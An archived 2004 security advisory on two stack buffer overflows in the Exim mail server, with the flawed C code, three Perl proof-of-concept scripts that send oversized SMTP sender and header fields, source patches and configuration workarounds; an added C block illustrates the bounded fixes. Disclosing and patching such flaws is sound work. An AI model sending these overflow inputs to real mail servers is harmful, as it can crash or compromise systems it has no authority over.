exim1.html
Posted May 7, 2004
Authored by Georgi Guninski | Site guninski.com

Two stack based buffer overflows exist in Exim 3.35. Both bugs need features enabled and are not in the default configuration. Proof of concept exploitation given.

tags | exploit, overflow, proof of concept
SHA-256 | 353e702b40c92a2c6f894d544e776cf46bb65be439d7576759dac932b6645004

<!DOCTYPE doctype PUBLIC "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<link rel="stylesheet" title="Default" href="main.css">
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-1">
<title>
Buffer overflows in exim, yet still exim much better than windows
</title>
</head>
<body style="color: rgb(0, 0, 0); background-color: rgb(255, 255, 255);">
<center>
<h2><span>Buffer overflows in exim, yet still exim much better than windows</span></h2>
</center>
<table border="0" cellspacing="0" cellpadding="0" width="90%"
align="center">
<tbody>
<tr>
<td width="100%">
<table border="0" width="100%">
<tbody>
<tr>
<td valign="top" nowrap="nowrap" width="16%"
bgcolor="#f1f0ef"><img src="logo2.gif" alt="cyrillic logo"> <br>
<a href="index.html">Home</a> <br>
<b>Security</b> <br>
<a href="browsers.html" class="sux">Internet Explorer</a> <br>
<a href="win2k.html" class="sux">Windows 2000</a> <br>
<a href="exploit.html">AIX</a> <br>
<a href="netscape.html">Netscape</a> <br>
<a href="misc.html">Misc</a> <br>
<b>Other</b> <br>
<a href="greets.html">Links</a> <br>
<a href="me.html">Services</a> <br>
<a href="menews.html">In the news</a> <br>
<a href="rand/index.html">Random stuff</a> <br>
<b>Contact</b> <br>
<a href="mailto:guninski@guninski.com">guninski@guninski.com</a></td>
<td valign="top" width="84%"> <div style="margin-left: 1em;"><br>
Georgi Guninski security advisory #68, 2004<br>
<br>
Buffer overflows in exim, yet still exim much better than windows<br>
<br>
Systems affected:<br>
two bugs in exim 3.35<br>
one of them present in exim 4.32<br>
<br>
Risk: Medium - not in default install<br>
Date: 6 May 2004<br>
<br>
Legal Notice:<br>
This Advisory is Copyright (c) 2004 Georgi Guninski.<br>
You may distribute it unmodified.<br>
You may not modify it and distribute it or distribute parts<br>
of it without the author's written permission - this especially applies to<br>
so called "vulnerabilities databases" and securityfocus, microsoft, cert<br>
and mitre.<br>
If you want to link to this content use the URL:<br>
<a href="http://www.guninski.com/exim1.html">http://www.guninski.com/exim1.html</a><br>
Anything in this document may change without notice.<br>
<br>
Disclaimer:<br>
The information in this advisory is believed to be true though<br>
it may be false.<br>
The opinions expressed in this advisory and program are my own and<br>
not of any company. The usual standard disclaimer applies,<br>
especially the fact that Georgi Guninski is not liable for any damages<br>
caused by direct or indirect use of the information or functionality<br>
provided by this advisory or program. Georgi Guninski bears no<br>
responsibility for content or misuse of this advisory or program or<br>
any derivatives thereof.<br>
<br>
Description:<br>
<br>
There are two stack based overflows in exim 3.35. One of them (bug1) is
easily<br>
exploitable. Ease of exploitation of the other one (bug2) is not clear,
but I<br>
won't be surprised if it is exploitable. Too lazy to check for sure.<br>
(bug2) is also present in exim 4.32.<br>
Neither bug is in the default exim configuration; both need options to be
enabled.<br>
<br>
Details:<br>
<br>
bug1:<br>
in exim 3.35 in verify.c there are two occurrences of:<br>
---<br>
<samp>sprintf(buffer, "%s:%.200s", sender_address,</samp><br>
---<br>
where buffer is a fixed-size array on the stack and sender_address is
copied with an unbounded "%s".<br>
This is a classic stack overflow.<br>
This bug works if "sender_verify = true" is in exim.conf<br>
To test for vulnerability:<br>
./exi1.pl | nc localhost 25<br>
then press enter.<br>
<br>
bug2:<br>
in accept.c for exim 3.35 and in verify.c for exim 4.32 there is:<br>
---<br>
<samp>char hname[64];<br>
char *t = h->text;<br>
char *tt = hname;<br>
char *verb = "is";<br>
int len;<br>
<br>
while (*t != ':') *tt++ = *t++;<br>
*tt = 0;</samp> <br>
---<br>
this code is hit if "headers_check_syntax" is in exim.conf for 3.35 and<br>
"require verify = header_syntax" is in the .conf for 4.32<br>
the difficulty of exploiting this is that "t" can have limited content,<br>
but can have arbitrary length, while hname is only 64 bytes.<br>
<br>
To test for vulnerability for 3.35:<br>
./exi2.pl | nc localhost 25<br>
then press enter.<br>
<br>
To test for vulnerability for 4.32:<br>
./exi3.pl localhost 25<br>
<br>
Fix:<br>
<br>
Unofficial fix from me, but debian seems to agree with it.<br>
<br>
for exim 3.35<br>
for bug1:<br>
in verify.c<br>
find the following:<br>
sprintf(buffer, "%s:%.200s", sender_address,<br>
&nbsp; (sender_host_name != NULL)? sender_host_name :<br>
&nbsp; (sender_host_address != NULL)? sender_host_address : "");<br>
and<br>
sprintf(buffer, "%s:%.200s", sender_address,<br>
&nbsp; (sender_host_name != NULL)? sender_host_name :<br>
&nbsp; (sender_host_address != NULL)? sender_host_address : "");<br>
<br>
in both above cases replace "sprintf(buffer," with:<br>
"snprintf(buffer, sizeof(buffer),"<br>
<br>
for bug2:<br>
in accept.c find:<br>
while (*t != ':') *tt++ = *t++;<br>
and replace it with:<br>
while (*t != ':' && tt < &hname[sizeof(hname)-2]) *tt++ = *t++;<br>
<br>
for exim 4.32<br>
for bug2:<br>
in verify.c find <br>
while (*t != ':') *tt++ = *t++;<br>
and replace it with:<br>
while (*t != ':' && tt < &hname[sizeof(hname)-2]) *tt++ = *t++;<br>
<br>
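The two bounded rewrites above, as an added example that is not Exim's code and not part of the original advisory: stand-alone C functions in the shape of the patched loop and the snprintf call, plus helpers that build inputs modelled on exi1.pl/exi2.pl so the truncation behaviour can be checked. HNAME_SIZE mirrors the page's hname[64]; KEY_SIZE, the function names and the '\0' check in the copy loop (which goes beyond the advisory's fix to also stop on a ':'-less line) are assumptions.<br>

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define HNAME_SIZE 64   /* mirrors "char hname[64]" in accept.c / verify.c */
#define KEY_SIZE   256  /* assumed size of the verify.c "buffer" array */

/* bug2, patched form: copy the header name up to ':' but never past the
 * end of hname. Returns bytes copied, or -1 when the name does not fit or
 * no ':' is reached (the unpatched loop also kept going on a ':'-less
 * line; the '\0' check here is an addition beyond the advisory's fix). */
int copy_header_name(const char *t, char hname[HNAME_SIZE])
{
    char *tt = hname;
    while (*t != '\0' && *t != ':' && tt < &hname[HNAME_SIZE - 2])
        *tt++ = *t++;
    *tt = '\0';
    return (*t == ':') ? (int)(tt - hname) : -1;
}

/* bug1, patched form: snprintf instead of sprintf. snprintf truncates
 * silently, so the caller must look at the return value to notice. */
int format_sender_key(char *buf, size_t n, const char *sender,
                      const char *host_name, const char *host_addr)
{
    int need = snprintf(buf, n, "%s:%.200s", sender,
                        host_name ? host_name : host_addr ? host_addr : "");
    return (need >= 0 && (size_t)need < n) ? 0 : -1;
}

/* Constructed input in the shape of exi2.pl: "From", then `padding`
 * spaces, then ':'. Returns what copy_header_name reports. */
int check_padded_from_header(int padding)
{
    char line[512], hname[HNAME_SIZE];
    int n = snprintf(line, sizeof line, "From%*s:vv v", padding, "");
    if (n < 0 || (size_t)n >= sizeof line) return -2;
    return copy_header_name(line, hname);
}

/* Constructed input in the shape of exi1.pl: a sender of `sender_len`
 * 'v' characters. Returns 0 if the key fit, -1 if it was truncated. */
int check_sender_key(size_t sender_len)
{
    char sender[400], buf[KEY_SIZE];
    if (sender_len >= sizeof sender) return -2;
    memset(sender, 'v', sender_len);
    sender[sender_len] = '\0';
    return format_sender_key(buf, sizeof buf, sender, NULL, "127.0.0.1");
}
```

With the bound in place an overlong header name or sender is reported as truncated instead of overwriting the stack; the page's fix does not report truncation, so callers that must reject rather than silently shorten need the return value.<br>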
Note: you need to change some addresses in the perls below.<br>
<br>
----exi1.pl----------------------------------<br>
<samp>#!/usr/bin/perl<br>
# works if sender_verify = true is in exim.conf<br>
# written by georgi guninski<br>
# cannot be used in vulnerability databases or CVE<br>
print "HELO a\r\n";<br>
my $ch=getc();<br>
print "MAIL FROM: " . "v" x 300 ."\@vt" . "\r\n";<br>
print "RCPT TO: BillGay\@localhost\r\n";<br>
print "DATA\r\n";<br>
#print "From" . " " x 65 . ":" . "ff fff ff" ."\r\n";<br>
print "asdasd\r\n";<br>
print "\r\n";<br>
print ".\r\n";<br>
print "QUIT\r\n";</samp><br>
---------------------------------------------<br>
<br>
----exi2.pl----------------------------------<br>
<samp>#!/usr/bin/perl<br>
# works if headers_check_syntax is in exim.conf<br>
# written by georgi guninski<br>
# cannot be used in vulnerability databases<br>
<br>
print "HELO a\r\nMAIL FROM: BillGay\@localhost\r\nRCPT TO: SteveNoBall\@localhost\r\n";<br>
print "DATA\r\n";<br>
my $ch=getc();<br>
print "From" . " " x 275 . ":" ."vv v \r\n";<br>
print "asdasd\r\n";<br>
print "\r\n";<br>
print ".\r\n";<br>
print "QUIT\r\n";</samp> <br>
---------------------------------------------<br>
<br>
<br>
----exi3.pl----------------------------------<br>
<samp>#!/usr/bin/perl<br>
<br>
use IO::Socket;<br>
<br>
my $port = $ARGV[1];<br>
my $host = $ARGV[0];<br>
<br>
# written by georgi guninski<br>
# cannot be used in vulnerability databases<br>
print "Written by georgi guninski\nCannot be used in vulnerability databases or CVE\n";<br>
<br>
my $repl;<br>
my $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") || die "socket";<br>
<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
my $req = "HELO a\r\n";<br>
<br>
syswrite($socket,$req,length($req));<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
<br>
<br>
my $fromaddr="BillGay\@soft";<br>
my $touser="SteveNoBall\@soft";<br>
<br>
$req = "MAIL FROM: ${fromaddr}\r\n";<br>
<br>
syswrite($socket,$req,length($req));<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
<br>
$req = "RCPT TO: ${touser}\r\n";<br>
syswrite($socket,$req,length($req));<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
$req = "DATA\r\n";<br>
<br>
syswrite($socket,$req,length($req));<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
<br>
print "Attached with debugger to exim and press enter\n";<br>
my $ccc=getc();<br>
<br>
$req = "From" . " " x 200 . ":" ." root\r\n";<br>
<br>
$req .= "just to let you know that you sux\r\n";<br>
$req .= ".\r\n";<br>
<br>
syswrite($socket,$req,length($req));<br>
$repl= <$socket>;<br>
print "server replied ${repl}";<br>
<br>
<br>
<br>
while(<$socket>)<br>
{<br>
print $_;<br>
}<br>
<br>
<br>
close $socket;<br>
</samp> <br>
<br>
---------------------------------------------<br>
<br>
<br>
Workaround:<br>
for exim 3.35<br>
make sure you don't have the following options in exim.conf:<br>
---<br>
sender_verify = true<br>
headers_check_syntax<br>
---<br>
for exim 4.32<br>
make sure you don't have the following option in the config file:<br>
require verify = header_syntax<br>
<br>
Vendor status:<br>
exim.org and debian are aware of the bugs<br>
<br>
Georgi Guninski<br>
http://www.guninski.com<br>
</div></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td> <br>
</td>
</tr>
</tbody>
</table>
<br>
&nbsp; <br>
&nbsp;
<center>
<p>| <a href="index.html">Home</a> | <a href="browsers.html">Internet
Explorer</a> | <a href="win2k.html">Windows 2000</a> | <a
href="exploit.html">AIX</a> | <a href="netscape.html">Netscape</a> | <a
href="greets.html">Links</a> | <a href="index.html">More...</a> |</p>
</center>
<p><br>
</p>
<br>
<br>
</body>
</html>